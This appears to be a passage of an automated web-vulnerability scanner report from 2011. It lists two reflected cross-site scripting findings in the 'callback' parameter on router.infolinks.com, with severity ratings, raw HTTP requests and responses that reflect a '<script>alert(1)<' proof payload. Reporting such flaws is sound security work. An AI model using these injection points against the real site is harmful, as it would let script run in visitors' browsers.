1. Cross-site scripting (reflected)
1.1. http://router.infolinks.com/gsd/1297859697017.0 [callback parameter]
1.2. http://router.infolinks.com/gsd/1297859731184.0 [callback parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://router.infolinks |
Path: | /gsd/1297859697017.0 |
GET /gsd/1297859697017.0 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://ultimatedsoftware Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset Content-Length: 184 Date: Wed, 16 Feb 2011 12:37:38 GMT Connection: close INFOLINKS.gsdCallback830b2<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://router.infolinks |
Path: | /gsd/1297859731184.0 |
GET /gsd/1297859731184.0 Host: router.infolinks.com Proxy-Connection: keep-alive Referer: http://ultimatedsoftware Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cuid=11d77bcd-1e56-4ec4 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0 Content-Type: text/javascript;charset Content-Length: 186 Date: Wed, 16 Feb 2011 12:38:37 GMT Connection: close INFOLINKS.gsdCallback8ac2e<script>alert(1)< |